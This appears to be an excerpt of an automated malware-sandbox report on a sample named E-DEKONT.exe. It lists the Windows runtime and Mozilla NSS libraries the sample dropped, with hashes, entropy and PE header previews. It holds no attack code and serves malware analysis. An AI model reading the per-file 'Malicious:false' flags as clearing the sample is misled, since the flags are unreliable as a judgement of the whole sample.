                                                                          Size (bytes):19256
                                                                          Entropy (8bit):7.060393359865728
                                                                          Encrypted:false
                                                                          SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                                                                          MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                                                                          SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                                                                          SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                                                                          SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-locale-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18744
                                                                          Entropy (8bit):7.13172731865352
                                                                          Encrypted:false
                                                                          SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                                                                          MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                                                                          SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                                                                          SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                                                                          SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................|..O........9...d...d.......|..O........d...............|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-math-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):28984
                                                                          Entropy (8bit):6.6686462438397
                                                                          Encrypted:false
                                                                          SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                                                                          MD5:8B0BA750E7B15300482CE6C961A932F0
                                                                          SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                                                                          SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                                                                          SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-multibyte-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):26424
                                                                          Entropy (8bit):6.712286643697659
                                                                          Encrypted:false
                                                                          SSDEEP:384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
                                                                          MD5:35FC66BD813D0F126883E695664E7B83
                                                                          SHA1:2FD63C18CC5DC4DEFC7EA82F421050E668F68548
                                                                          SHA-256:66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
                                                                          SHA-512:65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-private-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):73016
                                                                          Entropy (8bit):5.838702055399663
                                                                          Encrypted:false
                                                                          SSDEEP:1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
                                                                          MD5:9910A1BFDC41C5B39F6AF37F0A22AACD
                                                                          SHA1:47FA76778556F34A5E7910C816C78835109E4050
                                                                          SHA-256:65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
                                                                          SHA-512:A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-process-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):19256
                                                                          Entropy (8bit):7.076072254895036
                                                                          Encrypted:false
                                                                          SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                                                                          MD5:8D02DD4C29BD490E672D271700511371
                                                                          SHA1:F3035A756E2E963764912C6B432E74615AE07011
                                                                          SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                                                                          SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-runtime-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):22840
                                                                          Entropy (8bit):6.942029615075195
                                                                          Encrypted:false
                                                                          SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                                                                          MD5:41A348F9BEDC8681FB30FA78E45EDB24
                                                                          SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                                                                          SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                                                                          SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-stdio-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):24368
                                                                          Entropy (8bit):6.873960147000383
                                                                          Encrypted:false
                                                                          SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                                                                          MD5:FEFB98394CB9EF4368DA798DEAB00E21
                                                                          SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                                                                          SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                                                                          SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-string-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23488
                                                                          Entropy (8bit):6.840671293766487
                                                                          Encrypted:false
                                                                          SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                                                                          MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                                                                          SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                                                                          SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                                                                          SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-time-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):20792
                                                                          Entropy (8bit):7.018061005886957
                                                                          Encrypted:false
                                                                          SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                                                                          MD5:849F2C3EBF1FCBA33D16153692D5810F
                                                                          SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                                                                          SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                                                                          SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-utility-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18744
                                                                          Entropy (8bit):7.127951145819804
                                                                          Encrypted:false
                                                                          SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                                                                          MD5:B52A0CA52C9C207874639B62B6082242
                                                                          SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                                                                          SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                                                                          SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...|.......................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\freebl3.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):332752
                                                                          Entropy (8bit):6.8061257098244905
                                                                          Encrypted:false
                                                                          SSDEEP:6144:C+YBCxpjbRIDmvby5xDXlFVJM8PojGGHrIr1qqDL6XP+jW:Cu4Abg7XV72GI/qn6z
                                                                          MD5:343AA83574577727AABE537DCCFDEAFC
                                                                          SHA1:9CE3B9A182429C0DBA9821E2E72D3AB46F5D0A06
                                                                          SHA-256:393AE7F06FE6CD19EA6D57A93DD0ACD839EE39BA386CF1CA774C4C59A3BFEBD8
                                                                          SHA-512:827425D98BA491CD30929BEE6D658FCF537776CE96288180FE670FA6320C64177A7214FF4884AE3AA68E135070F28CA228AFB7F4012B724014BA7D106B5F0DCE
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L......Z.........."!.........f...............................................p......o.....@.............................P...`........@..p....................P..........T...........................8...@...............8............................text...U........................... ..`.rdata..............................@..@.data...lH..........................@....rsrc...p....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\mozglue.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):139216
                                                                          Entropy (8bit):6.841477908153926
                                                                          Encrypted:false
                                                                          SSDEEP:3072:8Oqe98Ea4usvd5jm6V0InXx/CHzGYC6NccMmxK3atIYHD2JJJsPyimY4kQkE:Vqe98Evua5Sm0ux/5YC6NccMmtXHD2JR
                                                                          MD5:9E682F1EB98A9D41468FC3E50F907635
                                                                          SHA1:85E0CECA36F657DDF6547AA0744F0855A27527EE
                                                                          SHA-256:830533BB569594EC2F7C07896B90225006B90A9AF108F49D6FB6BEBD02428B2D
                                                                          SHA-512:230230722D61AC1089FABF3F2DECFA04F9296498F8E2A2A49B1527797DCA67B5A11AB8656F04087ACADF873FA8976400D57C77C404EBA4AFF89D92B9986F32ED
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."yQ.f.?Mf.?Mf.?Mo`.Mv.?M.z>Lb.?M...Md.?M.z<Lh.?M.z;Lm.?M.z:Lu.?MDx>Lo.?Mf.>M..?M.{1Lu.?M.{?Lg.?M.{.Mg.?M.{=Lg.?MRichf.?M................PE..L......Z.........."!.........................................................@............@.............................\...L...,.... ..p....................0......p...T...............................@...................T...@....................text............................... ..`.rdata...b.......d..................@..@.data...............................@....rsrc...p.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\msvcp140.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):440120
                                                                          Entropy (8bit):6.652844702578311
                                                                          Encrypted:false
                                                                          SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                          MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                          SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                          SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                          SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\nss3.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1244112
                                                                          Entropy (8bit):6.809431682312062
                                                                          Encrypted:false
                                                                          SSDEEP:24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn
                                                                          MD5:556EA09421A0F74D31C4C0A89A70DC23
                                                                          SHA1:F739BA9B548EE64B13EB434A3130406D23F836E3
                                                                          SHA-256:F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
                                                                          SHA-512:2481FC80DFFA8922569552C3C3EBAEF8D0341B80427447A14B291EC39EA62AB9C05A75E85EEF5EA7F857488CAB1463C18586F9B076E2958C5A314E459045EDE2
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x..c+..c+..c+...+..c++.b*..c+lh.+..c++.`*..c++.f*..c++.g*..c+.b*..c+9.b*..c+..b+..c+9.k*..c+9.g*C.c+9.c*..c+9..+..c+9.a*..c+Rich..c+................PE..L...a..Z.........."!................T........................................@............@.............................d....<..T.......h.......................t~..0...T...............................@............................................text............................... ..`.rdata...P.......R..................@..@.data....E...`... ...:..............@....rsrc...h............Z..............@..@.reloc..t~...........^..............@..B................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\nssdbm3.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):92624
                                                                          Entropy (8bit):6.639368309935547
                                                                          Encrypted:false
                                                                          SSDEEP:1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw
                                                                          MD5:569A7A65658A46F9412BDFA04F86E2B2
                                                                          SHA1:44CC0038E891AE73C43B61A71A46C97F98B1030D
                                                                          SHA-256:541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
                                                                          SHA-512:C027B9D06C627026774195D3EAB72BD245EBBF5521CB769A4205E989B07CB4687993A47061FF6343E6EC1C059C3EC19664B52ED3A1100E6A78CFFB1C46472AFB
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L......Z.........."!.........0...............0............................................@..........................?.......@.......`..p............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..4....0... ..................@..@.data........P.......>..............@....rsrc...p....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\softokn3.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):144336
                                                                          Entropy (8bit):6.5527585854849395
                                                                          Encrypted:false
                                                                          SSDEEP:3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv
                                                                          MD5:67827DB2380B5848166A411BAE9F0632
                                                                          SHA1:F68F1096C5A3F7B90824AA0F7B9DA372228363FF
                                                                          SHA-256:9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
                                                                          SHA-512:910E15FD39B48CD13427526FDB702135A7164E1748A7EACCD6716BCB64B978FE333AC26FA8EBA73ED33BD32F2330D5C343FCD3F0FE2FFD7DF54DB89052DB7148
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L......Z.........."!.........`...............................................P......+Z....@..........................................0..p....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...C.......D..................@..@.data........ ......................@....rsrc...p....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\ucrtbase.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1142072
                                                                          Entropy (8bit):6.809041027525523
                                                                          Encrypted:false
                                                                          SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                                                                          MD5:D6326267AE77655F312D2287903DB4D3
                                                                          SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                                                                          SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                                                                          SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

